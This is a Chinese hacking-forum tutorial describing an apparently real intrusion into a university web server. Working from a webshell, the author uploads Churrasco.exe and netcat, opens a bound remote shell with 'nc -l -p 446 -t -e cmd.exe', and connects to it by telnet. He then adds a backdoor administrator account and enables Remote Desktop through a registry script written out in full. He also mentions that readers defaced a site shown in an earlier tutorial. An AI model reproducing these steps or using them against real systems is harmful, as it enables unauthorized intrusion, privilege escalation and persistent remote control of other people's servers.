作者; 萝卜头

博客地址 www.luobot.tk

好久也没出教程了 主要是我现在忙着管理我的群 人数越来越多有点乱 他们又让我忙着给他们做视频 !!所以也很少在暗组发视频了 一般都发到我的博客上了 !!
发话少说 进主题!***的是个大学到 网站 这里我就涂鸦了 !!上一次我发了个***php的网站没打好马赛克 叫一些手贱的人加以利用***目标主站 但是那个站就废了 !!!在这时我是叫你们技术不是叫你们破坏啊这么喜欢挂黑夜啊 迟早惹出事来 !!迟早到局子!!!

看看web支持的组件 !!
同时看下c盘program

QQ截图未命名1.jpg



QQ截图未命名.jpg




Wscript.Shell 支持 不错 这样就容易多了 !!其实不支持我在邪八看到一篇

关于《没有Wscript.shell组件提权我们该怎么办呢 》!!文章不错 有空可以

来看看 我已经保存到我的博客里了 http://hi.baidu.com/hc%C3%F7%C3%

F78888/blog/item/bc1ff60f3fd30eda3ac76348.html

下一步看磁盘信息 找到能写的磁盘!!
不是没权限看就是不可写 !!晕 其实 C盘回收站一般权限很大 的确可读可

写!!
QQ截图未命名2.jpg



QQ截图未命名3.jpg


好我们 上传我们的提取工具cmd.exe  Churrasco.exe  nc.exe  遇到点小麻烦 不能直接上传 我们的工具(提示 缺少对象 Microsoft VBScript 运行时错误(点此返回上页) 没权限需要远程下载!!
QQ截图未命名4.jpg


好本地搭建上传!!!
QQ截图未命名5.jpg


一次好上传完成!!!
QQ截图未命名6.jpg


下面就来 执行我们的命令 !!
来到 →> CMD---命令
net user看一下用户 !!
QQ截图未命名7.jpg


这种情况下是不能直接添加用户的

QQ截图未命名20.jpg



开始我们nc反弹!!!
nc格式命令
QQ截图未命名8.jpg


路径\nc.exe -l -p 端品 -t -e 路径\cmd.exe
这里我反弹的端口是446 (这个端口可以随便改 啊)
看我操作吧 !!
把命令放上执行 出现假死现象 我们在本机打开自己的cmd!!
用到telnet命令!!
本机TELNET命令
telnet 服务器IP 端口
先ping一下对方的ip
在cmd下输入 telnet 对方ip 446
好转到目标主机window\system32\下
QQ截图未命名9.jpg


这种情况下页无法添加用户!!
需要借助巴西帮助下 !!
QQ截图未命名10.jpg


看不行吧
好添加nft888的用户
QQ截图未命名11.jpg


好添加用户成功!!下一步 提升权限
QQ截图未命名12.jpg


好成功!!
看一下用户!!

QQ截图未命名21.jpg


好成功!!
我们去连接一下主机 晕@@@没开3389 !!!
没开自己去开啊!!也难不住我们!!

开3389
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
regedit /s 3389.reg
del 3389.reg

好我们运行我们的命令 成功!!!
未命名2.jpg


去连接主机 !!
未命名3.jpg



未命名4.jpg